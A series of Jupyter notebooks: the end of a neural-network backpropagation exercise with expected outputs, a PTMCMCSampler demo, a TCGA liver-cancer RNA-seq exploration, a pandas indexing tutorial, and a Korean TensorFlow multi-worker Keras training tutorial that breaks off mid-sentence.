**dW** </td> <td > [[-0.10076895 1.40685096 1.64992505]] </td> </tr> <tr> <td> **db** </td> <td> [[ 0.50629448]] </td> </tr> </table> ### 6.2 - Linear-Activation backward Next, you will create a function that merges the two helper functions: **`linear_backward`** and the backward step for the activation **`linear_activation_backward`**. To help you implement `linear_activation_backward`, we provided two backward functions: - **`sigmoid_backward`**: Implements the backward propagation for SIGMOID unit. You can call it as follows: ```python dZ = sigmoid_backward(dA, activation_cache) ``` - **`relu_backward`**: Implements the backward propagation for RELU unit. You can call it as follows: ```python dZ = relu_backward(dA, activation_cache) ``` If $g(.)$ is the activation function, `sigmoid_backward` and `relu_backward` compute $$dZ^{[l]} = dA^{[l]} * g'(Z^{[l]}) \tag{11}$$. **Exercise**: Implement the backpropagation for the *LINEAR->ACTIVATION* layer. ``` # GRADED FUNCTION: linear_activation_backward def linear_activation_backward(dA, cache, activation): """ Implement the backward propagation for the LINEAR->ACTIVATION layer. 
Arguments: dA -- post-activation gradient for current layer l cache -- tuple of values (linear_cache, activation_cache) we store for computing backward propagation efficiently activation -- the activation to be used in this layer, stored as a text string: "sigmoid" or "relu" Returns: dA_prev -- Gradient of the cost with respect to the activation (of the previous layer l-1), same shape as A_prev dW -- Gradient of the cost with respect to W (current layer l), same shape as W db -- Gradient of the cost with respect to b (current layer l), same shape as b """ linear_cache, activation_cache = cache if activation == "relu": ### START CODE HERE ### (≈ 2 lines of code) dZ = relu_backward(dA, activation_cache) ### END CODE HERE ### elif activation == "sigmoid": ### START CODE HERE ### (≈ 2 lines of code) dZ = sigmoid_backward(dA, activation_cache) ### END CODE HERE ### # Shorten the code dA_prev, dW, db = linear_backward(dZ, linear_cache) return dA_prev, dW, db AL, linear_activation_cache = linear_activation_backward_test_case() dA_prev, dW, db = linear_activation_backward(AL, linear_activation_cache, activation = "sigmoid") print ("sigmoid:") print ("dA_prev = "+ str(dA_prev)) print ("dW = " + str(dW)) print ("db = " + str(db) + "\n") dA_prev, dW, db = linear_activation_backward(AL, linear_activation_cache, activation = "relu") print ("relu:") print ("dA_prev = "+ str(dA_prev)) print ("dW = " + str(dW)) print ("db = " + str(db)) ``` **Expected output with sigmoid:** <table style="width:100%"> <tr> <td > dA_prev </td> <td >[[ 0.11017994 0.01105339] [ 0.09466817 0.00949723] [-0.05743092 -0.00576154]] </td> </tr> <tr> <td > dW </td> <td > [[ 0.10266786 0.09778551 -0.01968084]] </td> </tr> <tr> <td > db </td> <td > [[-0.05729622]] </td> </tr> </table> **Expected output with relu:** <table style="width:100%"> <tr> <td > dA_prev </td> <td > [[ 0.44090989 0. ] [ 0.37883606 0. ] [-0.2298228 0. 
]] </td> </tr> <tr> <td > dW </td> <td > [[ 0.44513824 0.37371418 -0.10478989]] </td> </tr> <tr> <td > db </td> <td > [[-0.20837892]] </td> </tr> </table> ### 6.3 - L-Model Backward Now you will implement the backward function for the whole network. Recall that when you implemented the `L_model_forward` function, at each iteration, you stored a cache which contains (X,W,b, and z). In the back propagation module, you will use those variables to compute the gradients. Therefore, in the `L_model_backward` function, you will iterate through all the hidden layers backward, starting from layer $L$. On each step, you will use the cached values for layer $l$ to backpropagate through layer $l$. Figure 5 below shows the backward pass. <img src="images/mn_backward.png" style="width:450px;height:300px;"> <caption><center> **Figure 5** : Backward pass </center></caption> ** Initializing backpropagation**: To backpropagate through this network, we know that the output is, $A^{[L]} = \sigma(Z^{[L]})$. Your code thus needs to compute `dAL` $= \frac{\partial \mathcal{L}}{\partial A^{[L]}}$. To do so, use this formula (derived using calculus which you don't need in-depth knowledge of): ```python dAL = - (np.divide(Y, AL) - np.divide(1 - Y, 1 - AL)) # derivative of cost with respect to AL ``` You can then use this post-activation gradient `dAL` to keep going backward. As seen in Figure 5, you can now feed in `dAL` into the LINEAR->SIGMOID backward function you implemented (which will use the cached values stored by the L_model_forward function). After that, you will have to use a `for` loop to iterate through all the other layers using the LINEAR->RELU backward function. You should store each dA, dW, and db in the grads dictionary. To do so, use this formula : $$grads["dW" + str(l)] = dW^{[l]}\tag{15} $$ For example, for $l=3$ this would store $dW^{[l]}$ in `grads["dW3"]`. **Exercise**: Implement backpropagation for the *[LINEAR->RELU] $\times$ (L-1) -> LINEAR -> SIGMOID* model. 
``` # GRADED FUNCTION: L_model_backward def L_model_backward(AL, Y, caches): """ Implement the backward propagation for the [LINEAR->RELU] * (L-1) -> LINEAR -> SIGMOID group Arguments: AL -- probability vector, output of the forward propagation (L_model_forward()) Y -- true "label" vector (containing 0 if non-cat, 1 if cat) caches -- list of caches containing: every cache of linear_activation_forward() with "relu" (it's caches[l], for l in range(L-1) i.e l = 0...L-2) the cache of linear_activation_forward() with "sigmoid" (it's caches[L-1]) Returns: grads -- A dictionary with the gradients grads["dA" + str(l)] = ... grads["dW" + str(l)] = ... grads["db" + str(l)] = ... """ grads = {} L = len(caches) # the number of layers m = AL.shape[1] Y = Y.reshape(AL.shape) # after this line, Y is the same shape as AL # Initializing the backpropagation ### START CODE HERE ### (1 line of code) dAL = - (np.divide(Y, AL) - np.divide(1 - Y, 1 - AL)) ### END CODE HERE ### # Lth layer (SIGMOID -> LINEAR) gradients. Inputs: "AL, Y, caches". Outputs: "grads["dAL"], grads["dWL"], grads["dbL"] ### START CODE HERE ### (approx. 2 lines) current_cache = caches[-1] grads["dA" + str(L)], grads["dW" + str(L)], grads["db" + str(L)] = linear_activation_backward(dAL, current_cache, "sigmoid") ### END CODE HERE ### for l in reversed(range(L-1)): # lth layer: (RELU -> LINEAR) gradients. # Inputs: "grads["dA" + str(l + 2)], caches". Outputs: "grads["dA" + str(l + 1)] , grads["dW" + str(l + 1)] , grads["db" + str(l + 1)] ### START CODE HERE ### (approx. 
5 lines) current_cache = caches[l] dA_prev_temp, dW_temp, db_temp = linear_activation_backward(grads["dA{}".format(l + 2)], current_cache, "relu") grads["dA" + str(l + 1)] = dA_prev_temp grads["dW" + str(l + 1)] = dW_temp grads["db" + str(l + 1)] = db_temp ### END CODE HERE ### return grads AL, Y_assess, caches = L_model_backward_test_case() grads = L_model_backward(AL, Y_assess, caches) print ("dW1 = "+ str(grads["dW1"])) print ("db1 = "+ str(grads["db1"])) print ("dA1 = "+ str(grads["dA1"])) ``` **Expected Output** <table style="width:60%"> <tr> <td > dW1 </td> <td > [[ 0.41010002 0.07807203 0.13798444 0.10502167] [ 0. 0. 0. 0. ] [ 0.05283652 0.01005865 0.01777766 0.0135308 ]] </td> </tr> <tr> <td > db1 </td> <td > [[-0.22007063] [ 0. ] [-0.02835349]] </td> </tr> <tr> <td > dA1 </td> <td > [[ 0.12913162 -0.44014127] [-0.14175655 0.48317296] [ 0.01663708 -0.05670698]] </td> </tr> </table> ### 6.4 - Update Parameters In this section you will update the parameters of the model, using gradient descent: $$ W^{[l]} = W^{[l]} - \alpha \text{ } dW^{[l]} \tag{16}$$ $$ b^{[l]} = b^{[l]} - \alpha \text{ } db^{[l]} \tag{17}$$ where $\alpha$ is the learning rate. After computing the updated parameters, store them in the parameters dictionary. **Exercise**: Implement `update_parameters()` to update your parameters using gradient descent. **Instructions**: Update parameters using gradient descent on every $W^{[l]}$ and $b^{[l]}$ for $l = 1, 2, ..., L$. ``` # GRADED FUNCTION: update_parameters def update_parameters(parameters, grads, learning_rate): """ Update parameters using gradient descent Arguments: parameters -- python dictionary containing your parameters grads -- python dictionary containing your gradients, output of L_model_backward Returns: parameters -- python dictionary containing your updated parameters parameters["W" + str(l)] = ... parameters["b" + str(l)] = ... """ L = len(parameters) // 2 # number of layers in the neural network # Update rule for each parameter. 
Use a for loop. ### START CODE HERE ### (≈ 3 lines of code) for l in range(L): parameters["W" + str(l + 1)] = parameters["W" + str(l + 1)] - learning_rate * grads["dW" + str(l + 1)] parameters["b" + str(l + 1)] = parameters["b" + str(l + 1)] - learning_rate * grads["db" + str(l + 1)] ### END CODE HERE ### return parameters parameters, grads = update_parameters_test_case() parameters = update_parameters(parameters, grads, 0.1) print ("W1 = "+ str(parameters["W1"])) print ("b1 = "+ str(parameters["b1"])) print ("W2 = "+ str(parameters["W2"])) print ("b2 = "+ str(parameters["b2"])) ``` **Expected Output**: <table style="width:100%"> <tr> <td > W1 </td> <td > [[-0.59562069 -0.09991781 -2.14584584 1.82662008] [-1.76569676 -0.80627147 0.51115557 -1.18258802] [-1.0535704 -0.86128581 0.68284052 2.20374577]] </td> </tr> <tr> <td > b1 </td> <td > [[-0.04659241] [-1.28888275] [ 0.53405496]] </td> </tr> <tr> <td > W2 </td> <td > [[-0.55569196 0.0354055 1.32964895]]</td> </tr> <tr> <td > b2 </td> <td > [[-0.84610769]] </td> </tr> </table> ## 7 - Conclusion Congrats on implementing all the functions required for building a deep neural network! We know it was a long assignment but going forward it will only get better. The next part of the assignment is easier. In the next assignment you will put all these together to build two models: - A two-layer neural network - An L-layer neural network You will in fact use these models to classify cat vs non-cat images!
github_jupyter
``` import numpy as np import matplotlib.pylab as plt import corner import numpy as np import glob from PTMCMCSampler import PTMCMCSampler %matplotlib inline ``` ## Define the likelihood and posterior Functions must read in parameter vector and output log-likelihood or log-prior. Usually easiest to use a class if you need to store some other data or parameters ``` class GaussianLikelihood(object): def __init__(self, ndim=2, pmin=-10, pmax=10): self.a = np.ones(ndim)*pmin self.b = np.ones(ndim)*pmax # get means self.mu = [2]*ndim # ... and a positive definite, non-trivial covariance matrix. cov = 0.5-np.random.rand(ndim**2).reshape((ndim, ndim)) cov = np.triu(cov) cov += cov.T - np.diag(cov.diagonal()) self.cov = np.dot(cov,cov) # Invert the covariance matrix first. self.icov = np.linalg.inv(self.cov) def lnlikefn(self, x): diff = x - self.mu return -np.dot(diff,np.dot(self.icov, diff))/2.0 def lnpriorfn(self, x): if np.all(self.a <= x) and np.all(self.b >= x): return 0.0 else: return -np.inf ``` ## Setup Gaussian model class ``` ndim = 2 pmin, pmax = 0.0, 10.0 glo = GaussianLikelihood(ndim=ndim, pmin=pmin, pmax=pmax) ``` ## Setup sampler Need to initalize the sample at ```p0``` and give an inital jump covariance matrix ```cov```. ``` # Set the start position and the covariance p0 = np.random.uniform(pmin, pmax, ndim) cov = np.eye(ndim) * 0.1**2 sampler = PTMCMCSampler.PTSampler(ndim, glo.lnlikefn, glo.lnpriorfn, np.copy(cov), outDir='./chains') ``` ## Jump Proposals We have the option to choose whatever jump proposals we would like to use in our analysis. Here, we will use the `Uniform` jump proposal (meaning all jumps are equally likely). ``` weights = {"Uniform": 1} initialize_jump_proposal_kwargs = {"Uniform": {"pmin": 0, "pmax": 10}} ``` ## Run Sampler for 200000 steps Different jump proposal weights are given as integers. For example we have used a weight of 20 for all three proposals here. That means that each will be used with a probability of 20/60 = 1/3. 
``` data = sampler.sample(p0, 5000, weights=weights, initialize_jump_proposal_kwargs=initialize_jump_proposal_kwargs, burn=500, thin=1, covUpdate=500) ``` ## Finally we can plot the data ``` fig = data.plot_chains() ``` If you want to see what the chains looked like before burnin, you can simply run the following: ``` data.set_burnin(0) fig = data.plot_chains() data.set_burnin(500) fig = data.plot_corner(truths=glo.mu) ``` ## Save the data ``` data.save(outfile="simple.txt") ```
github_jupyter
# Exploratory Data Analysis of Cancer Genomics data using TCGA In this notebook, we will take a look at one of the canonical datasets, if not _the_ dataset, in cancer genomics: TCGA. We'll start with investigating the RNA Sequencing (rnaseq) and Clinical data available for a type of liver cancer known as hepatocellular carcinoma (HCC). Hepatocellular carcinoma is the most common form of liver cancer in the United States, making up [more than 80% of cases](https://www.cancer.gov/about-nci/organization/ccg/research/structural-genomics/tcga/studied-cancers/liver). The TCGA dataset is abbreviated LIHC. Some examples of what researchers have learned from the LIHC dataset at the DNA-level include confirmed [frequent mutations](https://www.cancer.gov/about-nci/organization/ccg/research/structural-genomics/tcga/studied-cancers/liver) in: - The TERT promotor region, associated with regulating cell survival - TP53, one of the most frequently mutated genes in cancer - CTNNB1, a member of the Wnt signaling pathway that mediates cell growth and differentiation There are currently several therapies under development that target these genes. In addition to DNA alterations however, different biological and tumor microenvrionment factors can [influence disease progression](https://www.ncbi.nlm.nih.gov/pmc/articles/PMC6237857/). A transcriptomic survey of tissues at various stages of disease progression could help elucidate some of the underlying pathways contributing to tumorigenesis. ### Today, we'll be focusing on using RNA-seq data from LIHC combined with clinical attributes to identify biomarkers for disease progression. 
The data is stored in the R package _[RTCGA](http://rtcga.github.io/RTCGA/)_ ## Load libraries ``` import numpy as np import pandas as pd import matplotlib.pyplot as plt import seaborn as sns ``` ## Set variables ``` data_dir="data/" response_name="patient.race" rnaseq_file=data_dir+"lihc_rnaseq.csv.gz" clinical_file=data_dir+"lihc_clinical.csv.gz" ``` ## Load data The data is stored in the RTCGA package in the R programming language. I've outputted it for easy use within python. We will be investigating the Hepatocellular carcinoma dataset. Read about it [here](https://www.ncbi.nlm.nih.gov/pmc/articles/PMC5680778/). The TCGA RNASeq data is illumina hiseq Level 3 RSEM normalized expression data. You can read about thec RSEM method [here](https://academic.oup.com/bioinformatics/article/26/4/493/243395). Essentially this is the raw counts of reads that aligned to the gene transcript, though it's only a guess by the program. Since it's a guess, the values are rational numbers. To simplify things, we'll round the values to the next whole integer. ``` rnaseq = (pd. read_csv(rnaseq_file,compression="gzip"). set_index('bcr_patient_barcode'). applymap(lambda x : int(np.ceil(x))) ) display(rnaseq.shape) display(rnaseq.head()) gene_name_logical = [len(x[0])>1 for x in rnaseq.columns.str.split('|')] sub = rnaseq.loc[:,gene_name_logical] sub.columns = [x[0] for x in sub.columns.str.split('|')] rnaseq_sub = sub.copy() rnaseq_sub.head() ``` The clinical data is within the RTCGA package, but is also available [here](https://portal.gdc.cancer.gov/projects/TCGA-LIHC). More cdescription of the clinical attributes are [here](https://gdc.cancer.gov/about-data/data-harmonization-and-generation/clinical-data-harmonization). ``` clinical = pd.read_csv(clinical_file,compression="gzip").set_index('patient.bcr_patient_barcode') display(clinical.shape) display(clinical.head()) ``` ## Gene level distribution In this section, we will investigate the value distribution of genes in our dataset. 
<br> #### Sample Questions: - What is the range of values for a given gene? - What is the distribution of values for a given gene? - Are there higher than average or lower than average expression of genes? ## Dimension reduction based on gene expression If we were working with a smaller dataset we'd be able to plot the few genes we had on an expression by sample graph. However, we are working with 20k genes and will need a better method than creating 20k separate plots. One way to visualize sample distances is to reduce the dimensional space of gene expression across samples. Using principal component analysis (PCA) we can project the data points into a 2D plane so that each axis or component captures the greatest variation of the sample expression. PCA can be useful to characterize the distances between samples and identify groups of samples that may be farther or closer apart. We can also identify any samples that might be worth excluding from our analysis. Documentation on sklearn's PCA function can be found [here](https://scikit-learn.org/stable/modules/generated/sklearn.decomposition.PCA.html). ``` from sklearn.decomposition import PCA pca = PCA(n_components=2) ``` ## Differential Expression Analysis We can statistically test for a difference in gene expression by performing a hypothesis test for each gene to see whether there is evidence to decide that expression is significantly different between conditions. In this section, we will investigate differential expression results derived from the [DESeq2] package in R. Also see this [vignette](https://bioconductor.org/packages/release/bioc/vignettes/DESeq2/inst/doc/DESeq2.html) on how to do these analyses, as well as understand the methods. Briefly, a Sample x Gene matrix of raw count reads and a matching matrix of phenotypes (eg, treatment or condition) for each sample are inputted into DEseq2. 
In order to account for RNA composition bias and library size, when only a small number of genes are highly expressed in one condition vs another, these genes are normalized by dividing the expression by the mean expression for each gene across samples. DEseq2 fits a [negative binomial](https://en.wikipedia.org/wiki/Negative_binomial_distribution) generalized linear model to each gene and uses the [Wald test](https://www.statisticshowto.datasciencecentral.com/wald-test) for significance. Outliers are detected using Cook's distance and removed from the dataset. Genes with low normalized mean expression values below a threshold are also removed to improve detection power. https://chipster.csc.fi/manual/deseq2.html #### Sample questions: - Which genes are differentially expressed? Are they positively or negatively expressed compared to your control? - What do these genes do? Which pathways are they involved in? - Are there related clinical phenotypes which might show similar differences in expression? ### Running differential expression analysis via DEseq2 We've created a subprocess to run the R package DEseq2 with our data and return the results in a python-friendly format. To run this script on the command line use: ``` Rscript TCGA_differential_expression_analysis.R "" lihc_rnaseq.csv.gz lihc_clinical.csv.gz 100 patient.gender female male ``` (script name | rna_seq_file.csv.gz | clinical_data_file.csv.gz | num_genes_to_run | clinical_attribute_col | attribute 1 | attribute 2) Use the output of this file (lihc_DESeq2_100_sampled_genes_patient.gender_female_vs_male.csv) to plot and identify differentially-expressed genes. You can change the clinical columns, attributes and number of genes to explore additional clinical variables. ``` de_gender = pd.read_csv('lihc_DESeq2_100_sampled_genes_patient.gender_female_vs_male.csv') de_gender.head() ``` Create diagnostic plots to help us visualize the data. 
An MA-plot shows the log2 fold changes from the treatment over the mean of normalized counts, i.e. the average of counts normalized by size factor. ### Pathway analysis We can do a brief survey of what kinds of pathways and functions some of our differentially expressed genes are involved in. We will use the [BioMart](http://www.biomart.org/martservice_9.html) service to annotate our genes with gene ontology (GO) terms. ``` from pybiomart import Server, Dataset dataset = Dataset(name='hsapiens_gene_ensembl', host='http://www.ensembl.org') attributes = [ 'go_id', 'name_1006', 'definition_1006', 'hgnc_symbol', ] bm = dataset.query(attributes=attributes, filters={'chromosome_name': ['1','2']}) bm ``` ## Clinical data type investigation Now that we've gone through the steps of exploratory analysis for a single clinical attribute, you can repeat this process and explore how other clinical factors may change gene expression. In this section, we will investigate the diversity of the clinical data. Explore the clinical attributes available in the dataset. We are interested in understanding whether there are RNA signatures that change according to disease progression for hepatocellular carcinoma. Are there any relevant attributes in the clinical data which are relevant to identifying this kind of biomarker? #### Sample Questions: - How many unique values are there for a given clinical attribute? - How can we define an appropriate response variable for supervised learning? - What clinical attributes can be used to identify biomarkers for disease progression? ## Set up for supervised learning In this section, we will set up a supervised learning paradigm using the Genes within the RNASeq data as predictors and a clinical attribute as a response variable.
github_jupyter
# Ch3.1 Data Indexing and Selection ## Data Selection in Series ### Series as dictionary ``` import pandas as pd data = pd.Series([0.25, 0.5, 0.75, 1.0], index=['a', 'b', 'c', 'd']) data data['b'] ``` We can also use dictionary-like Python expressions and methods to examine the keys/indices and values: ``` 'a' in data data.index data.keys() list(data.items()) ``` extend a ``Series`` by assigning to a new index value: ``` data['e'] = 1.25 data ``` ### Series as one-dimensional array ``` # slicing by explicit index data['a':'c'] # slicing by implicit integer index data[0:2] # masking data[(data > 0.3) & (data < 0.8)] # fancy indexing data[['a', 'e']] ``` ### Indexers: loc, iloc ``` data = pd.Series(['a', 'b', 'c'], index=[1, 3, 5]) data # explicit index when indexing data[1] # implicit index when slicing data[1:3] ``` the ``loc`` attribute allows indexing and slicing that always references the explicit index: ``` data.at[1] data.loc[1] data.loc[1:3] ``` The ``iloc`` attribute allows indexing and slicing that always references the implicit Python-style index: ``` data.iloc[1] data.iloc[1:3] ``` ## Data Selection in DataFrame ### DataFrame as a dictionary ``` area = pd.Series({'California': 423967, 'Texas': 695662, 'New York': 141297, 'Florida': 170312, 'Illinois': 149995}) pop = pd.Series({'California': 38332521, 'Texas': 26448193, 'New York': 19651127, 'Florida': 19552860, 'Illinois': 12882135}) data = pd.DataFrame({'area':area, 'pop':pop}) data data['area'] #dictionary-style indexing data.area #attribute-style access ``` This attribute-style column access actually accesses the exact same object as the dictionary-style access: ``` data.area is data['area'] ``` the ``DataFrame`` has a ``pop()`` method, so ``data.pop`` will point to this rather than the ``"pop"`` column: ``` data.pop is data['pop'] ``` adding a new column: ``` data['density'] = data['pop'] / data['area'] data ``` ### DataFrame as two-dimensional array ``` data.index data.values ``` transpose the full 
``DataFrame`` to swap rows and columns: ``` data.T ``` passing a single index to an array accesses a row: ``` data.values[0] ``` passing a single "index" to a ``DataFrame`` accesses a column: ``` data['area'] ``` access multiple columns ``` data[['area','pop']] ``` Using the iloc indexer, the ``DataFrame`` index and column labels are maintained in the result: ``` data data.iloc[:3, :2] data.iloc[1,2] data.iloc[0] ``` Using the ``loc`` indexer we can index the underlying data using the explicit index and column names: ``` data.loc['Texas'] data.loc['Illinois', 'pop'] data.loc[:'Illinois', :'pop'] data.loc[:, 'pop':] ``` combine masking and fancy indexing as in the following: ``` data.loc[data.density > 100, ['pop', 'density']] ``` to set or modify values ``` data.iloc[0, 2] = 90 data ``` ### Additional indexing conventions ``` data['Florida':'Illinois'] # slicing rows ``` Such slices can also refer to rows by number rather than by index: ``` data[1:3] ``` Similarly, direct masking operations are also interpreted row-wise rather than column-wise: ``` data[data.density > 100] ``` Access a single value for a row/column pair ``` data.at['Texas','area'] data.iat[4,0] ```
github_jupyter
##### Copyright 2019 The TensorFlow Authors. ``` #@title Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # https://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. ``` # 케라스를 사용한 다중 워커(Multi-worker) 훈련 <table class="tfo-notebook-buttons" align="left"> <td> <a target="_blank" href="https://www.tensorflow.org/tutorials/distribute/multi_worker_with_keras"><img src="https://www.tensorflow.org/images/tf_logo_32px.png" />TensorFlow.org에서 보기</a> </td> <td> <a target="_blank" href="https://colab.research.google.com/github/tensorflow/docs/blob/master/site/ko/tutorials/distribute/multi_worker_with_keras.ipynb"><img src="https://www.tensorflow.org/images/colab_logo_32px.png" />구글 코랩(Colab)에서 실행하기</a> </td> <td> <a target="_blank" href="https://github.com/tensorflow/docs/blob/master/site/ko/tutorials/distribute/multi_worker_with_keras.ipynb"><img src="https://www.tensorflow.org/images/GitHub-Mark-32px.png" />깃허브(GitHub) 소스 보기</a> </td> </table> Note: 이 문서는 텐서플로 커뮤니티에서 번역했습니다. 커뮤니티 번역 활동의 특성상 정확한 번역과 최신 내용을 반영하기 위해 노력함에도 불구하고 [공식 영문 문서](https://github.com/tensorflow/docs/blob/master/site/en/tutorials/distribute/multi_worker_with_keras.ipynb)의 내용과 일치하지 않을 수 있습니다. 이 번역에 개선할 부분이 있다면 [tensorflow/docs](https://github.com/tensorflow/docs) 깃허브 저장소로 풀 리퀘스트를 보내주시기 바랍니다. 문서 번역이나 리뷰에 참여하려면 [docs-ko@tensorflow.org](https://groups.google.com/a/tensorflow.org/forum/#!forum/docs-ko)로 메일을 보내주시기 바랍니다. ## 개요 이 튜토리얼에서는 `tf.distribute.Strategy` API를 사용하여 케라스 모델을 다중 워커로 분산 훈련하는 방법을 살펴보겠습니다. 
다중 워커를 사용하여 훈련할 수 있도록 전략을 디자인했기 때문에, 단일 워커 훈련용으로 만들어진 케라스 모델도 코드를 조금만 바꾸면 다중 워커를 사용하여 훈련할 수 있습니다. `tf.distribute.Strategy` API에 관심이 있으신 분들은 [텐서플로로 분산 훈련하기](../../guide/distributed_training.ipynb) 가이드에서 텐서플로가 제공하는 분산 훈련 전략들을 훑어보실 수 있습니다. ## 설정 먼저, 텐서플로를 설정하고 필요한 패키지들을 가져옵니다. ``` from __future__ import absolute_import, division, print_function, unicode_literals try: # %tensorflow_version 기능은 코랩에서만 사용할 수 있습니다. %tensorflow_version 2.x except Exception: pass import tensorflow_datasets as tfds import tensorflow as tf tfds.disable_progress_bar() ``` ## 데이터셋 준비하기 MNIST 데이터셋을 [TensorFlow Datasets](https://www.tensorflow.org/datasets)에서 받아옵시다. [MNIST 데이터셋](http://yann.lecun.com/exdb/mnist/)은 0-9 숫자를 손으로 쓴 28x28 픽셀 흑백 이미지입니다. 6만 개의 훈련 샘플과 만 개의 테스트 샘플이 들어있습니다. ``` BUFFER_SIZE = 10000 BATCH_SIZE = 64 # MNIST 데이터를 (0, 255] 범위에서 (0., 1.] 범위로 조정 def scale(image, label): image = tf.cast(image, tf.float32) image /= 255 return image, label datasets, info = tfds.load(name='mnist', with_info=True, as_supervised=True) train_datasets_unbatched = datasets['train'].map(scale).cache().shuffle(BUFFER_SIZE) train_datasets = train_datasets_unbatched.batch(BATCH_SIZE) ``` ## 케라스 모델 만들기 `tf.keras.Sequential` API를 사용하여 간단한 합성곱 신경망 케라스 모델을 만들고 컴파일하도록 하겠습니다. 우리 MNIST 데이터셋으로 훈련시킬 모델입니다. Note: 케라스 모델을 만드는 절차는 [텐서플로 케라스 가이드](https://www.tensorflow.org/guide/keras#sequential_model)에서 더 상세하게 설명하고 있습니다. ``` def build_and_compile_cnn_model(): model = tf.keras.Sequential([ tf.keras.layers.Conv2D(32, 3, activation='relu', input_shape=(28, 28, 1)), tf.keras.layers.MaxPooling2D(), tf.keras.layers.Flatten(), tf.keras.layers.Dense(64, activation='relu'), tf.keras.layers.Dense(10, activation='softmax') ]) model.compile( loss=tf.keras.losses.sparse_categorical_crossentropy, optimizer=tf.keras.optimizers.SGD(learning_rate=0.001), metrics=['accuracy']) return model ``` 먼저 단일 워커를 이용하여 적은 수의 에포크만큼만 훈련을 해보고 잘 동작하는지 확인해봅시다. 에포크가 넘어감에 따라 손실(loss)은 줄어들고 정확도는 1.0에 가까워져야 합니다. 
``` single_worker_model = build_and_compile_cnn_model() single_worker_model.fit(x=train_datasets, epochs=3) ``` ## 다중 워커 구성 자 이제 다중 워커 훈련의 세계로 들어가 봅시다. 텐서플로에서 여러 장비를 사용할 때는 `TF_CONFIG` 환경 변수를 설정해야 합니다. 하나의 클러스터를 구성하는 각 장비에 클러스터 구성을 알려주고 각각 다른 역할을 부여하기 위해 `TF_CONFIG`를 사용합니다. `TF_CONFIG`는 `cluster`와 `task` 두 개의 부분으로 구성됩니다. `cluster`에는 훈련 클러스터에 대한 정보를 지정합니다. `worker` 같은 여러 타입의 작업 이름을 키로 하는 파이썬 딕셔너리를 지정합니다. 다중 워커 훈련에서는 보통 일반적인 워커보다 조금 더 많은 일을 하는 특별한 워커가 하나 필요합니다. 이 워커는 체크포인트를 저장하거나, 서머리(summary)를 쓰는 일 등을 추가로 담당하게 됩니다. 보통 치프('chief') 워커라고 부르고, 관례적으로 `index` 번호가 0인 워커가 치프 워커가 됩니다(사실 `tf.distribute.Strategy`가 이렇게 구현되었습니다). 한편 `task`에는 현재 워커의 작업에 대한 정보를 지정합니다. 이 예에서는 작업(task) `type`을 `"worker"`로 지정하고, `index`는 `0`으로 지정하였습니다. 이 말은 이 장비가 첫 번째 워커이고, 따라서 치프 워커이며, 다른 워커보다 더 많은 일을 하게 된다는 뜻입니다. 물론 다른 장비들에도 `TF_CONFIG` 환경변수가 설정되어야 합니다. 다른 장비들에도 `cluster`에는 동일한 딕셔너리를 지정하겠지만, `task`에는 각 장비의 역할에 따라 다른 작업 `type`이나 `index`를 지정해야 합니다. 예시를 위하여, 이 튜토리얼에서는 두 개의 워커를 `localhost`에 띄우는 방법을 보여드리겠습니다. 실제로는 각 워커를 다른 장비에서 띄울텐데, 실제 IP 주소와 포트를 할당하고, 그에 맞게 `TF_CONFIG`를 지정해야 합니다. 주의: 아래 코드를 코랩에서 실행하지 마십시오. 텐서플로 런타임이 주어진 IP와 포트로 gRPC 서버를 띄우려고 할 텐데, 아마도 실패할 것입니다. ``` os.environ['TF_CONFIG'] = json.dumps({ 'cluster': { 'worker': ["localhost:12345", "localhost:23456"] }, 'task': {'type': 'worker', 'index': 0} }) ``` 이 예제에서는 학습률을 바꾸지 않고 그대로 사용한 것에 주의하십시오. 실제로는 전역(global) 배치 크기에 따라 학습률을 조정해야 할 수 있습니다. ## 적절한 전략 고르기 텐서플로의 분산 전략은 크게 각 훈련 단계가 워커들이 가진 복제본들끼리 동기화되는 동기 훈련 방식과, 동기화가 엄격하게 이루어지지 않는 비동기 훈련 방식이 있습니다. 이 튜토리얼에서 다루는 `MultiWorkerMirroredStrategy`는 동기 다중 워커 훈련에서 추천하는 전략입니다. 모델을 훈련하려면 `tf.distribute.experimental.MultiWorkerMirroredStrategy` 인스턴스를 하나 만드십시오. `MultiWorkerMirroredStrategy`는 모델의 레이어에 있는 모든 변수의 복사본을 각 워커의 장치마다 만듭니다. 그리고 수집 작업을 위한 텐서플로 연산인 `CollectiveOps`를 사용하여 그래디언트를 모으고, 각 변수의 값을 동기화합니다. [`tf.distribute.Strategy` 가이드](../../guide/distributed_training.ipynb)에 이 전략에 대한 더 자세한 설명이 있습니다. 
``` strategy = tf.distribute.experimental.MultiWorkerMirroredStrategy() ``` Note: `MultiWorkerMirroredStrategy.__init__()`가 호출될 때, `TF_CONFIG`를 파싱하고 텐서플로 gRPC 서버가 구동됩니다. 따라서 `TF_CONFIG` 환경변수는 `tf.distribute.Strategy` 인스턴스를 만들기 전에 설정해야 합니다. `MultiWorkerMirroredStrategy` 는 [`CollectiveCommunication`](https://github.com/tensorflow/tensorflow/blob/a385a286a930601211d78530734368ccb415bee4/tensorflow/python/distribute/cross_device_ops.py#L928) 매개변수로 선택할 수 있는 여러 가지 구현체를 제공합니다. `RING`(링)은 링 구조 기반의 수집 작업 구현체이고, 장비 간 통신을 위하여 gRPC를 사용합니다. `NCCL`은 [Nvidia의 NCCL](https://developer.nvidia.com/nccl)로 수집 작업을 구현한 것입니다. `AUTO`를 지정하면, 런타임이 알아서 선택합니다. 어떤 수집 작업 구현체가 최적인지는 GPU의 종류와 수, 클러스터 내 네트워크 연결 등 여러 요소에 따라 달라집니다. ## MultiWorkerMirroredStrategy로 모델 훈련하기 다중 워커 분산 훈련을 위하여 `tf.distribute.Strategy` API를 `tf.keras`와 함께 사용하려면, 딱 한 가지만 바꾸면 됩니다. 바로 모델 구성과 `model.compile()` 호출 코드를 `strategy.scope()` 안으로 넣는 것입니다. 분산 전략의 범위(scope)를 써서 변수를 어디에 어떻게 만들지 지정할 수 있습니다. `MultiWorkerMirroredStrategy`의 경우, 만들어지는 변수는 `MirroredVariable`이고, 각 워커에 복제본이 생깁니다. Note: 아래 코드가 예상과 같이 동작하는 것처럼 보이겠지만, 사실은 단일 워커로 동작하는 것입니다. `TF_CONFIG`가 설정되어 있지 않기 때문입니다. 실제로 `TF_CONFIG`를 